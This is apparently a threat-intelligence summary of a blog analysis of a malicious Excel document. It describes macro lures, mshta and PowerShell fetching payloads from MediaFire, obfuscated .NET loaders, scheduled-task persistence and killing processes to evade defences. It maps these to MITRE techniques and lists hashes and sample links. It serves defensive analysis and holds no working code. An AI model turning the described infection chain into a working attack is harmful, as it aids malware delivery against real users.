Two-sentence summary: An in-depth look at a convoluted infection chain embedded in an Excel document that lures users to enable macros, then unleashes a multi-stage payload across embedded worksheets. The campaign uses obfuscated .NET loaders (Tupak, Chimchim), PowerShell and mshta executions, and scheduled tasks to fetch and run additional payloads while attempting to evade detection. #Tupak #Chimchim #MediaFire #PowerShell #Mshta #LOLBAS #IntelliLock
Keypoints
- The lure is an Excel document that tries to get the user to enable content to run a hidden payload.
- Multiple copies of the same Excel workbook are embedded to frustrate users and push them to enable macros.
- Embedded worksheets appear encrypted; a default password “VelvestSweatshop” is referenced during analysis.
- The payload chain uses mshta to execute a script from MediaFire and PowerShell to download and run additional components.
- Decoded/decoded scripts are obfuscated (Unescape, hex/string tricks) and then decompressed as a GZip payload before execution.
- The malware loads .NET assemblies (tupak, chimchim) into memory and uses IntelliLock-like obfuscation and LOLBAS techniques.
- The campaign schedules tasks (e.g., calsaasdendersw) to periodically contact websites and fetch new payloads, while also attempting to kill other processes to evade defenses.
- Several samples and hashes are shared on MalwareBazaar, illustrating multiple named binaries and variants used in the campaign.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – The lure here tries to get the user to enable content in order to run whatever surprise they have hidden inside. “The lure here trying to get the user to enable content in order to run whatever surprise they have hidden inside.”
- [T1059.001] PowerShell – The campaign involves PowerShell to download and execute payloads. “two calls to the internet. The first one will use PowerShell to download and run a file.”
- [T1218.005] Signed Binary Proxy Execution: Mshta – The execution uses mshta to run a script from a remote host. “Here we see it will use mshta to run a script from mediafire[.com].”
- [T1027] Obfuscated/Compressed Files and Information – The payloads are encoded/decrypted as part of the delivery chain. “The first script uses ‘unescape’ to decode the script.”
- [T1140] Deobfuscate/Decode Files or Information – The unescape/decode/decompress steps are used to render the payload usable. “Once we do the “Unescape”, it is still difficult to read with all of the escape chars and the “+” and ‘+’ concatenation chars.”
- [T1105] Ingress Tool Transfer – The chain involves downloading and executing payloads from the internet. “two calls to the internet. The first one will use PowerShell to download and run a file.”
- [T1053.005] Scheduled Task – The malware establishes recurring tasks to fetch payloads and call out to websites. “So our Scheduled task with a name of “calsaasdendersw” will fire every 93 Minuets and call out to a website.”
- [T1562.001] Impair Defenses – The code kills processes to evade detection and ensure operation. “the Office processes were killed so it will end some of these early.”
Indicators of Compromise
- [File Hash] 2cc30a017cf7312c737be593f36f2d84dd38c285a75512c9ab2e78f0bc1ba48b – Excel document sample
- [File Hash] 9EF3B6FAAB18ECB56E819A6B1B6063CAF99666D8003A67E55690F27EF92C2B56 – Golaу-Hex.bin
- [File Name] Golaу-Hex.bin – referenced as a sample blob in the campaign
- [File Name] asjdiajsidjjaidjasd-Hex.bin – additional sample blob in the campaign
- [Domain] bazaar.abuse.ch – MalwareBazaar listing for samples
- [URL] https://bazaar.abuse.ch/sample/9ef3b6faab18ecb56e819a6b1b6063caf99666d8003a67e55690f27ef92c2b56/ – MalwareBazaar sample page
- [URL] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create – SchTasks documentation referenced in the article
Read more: https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel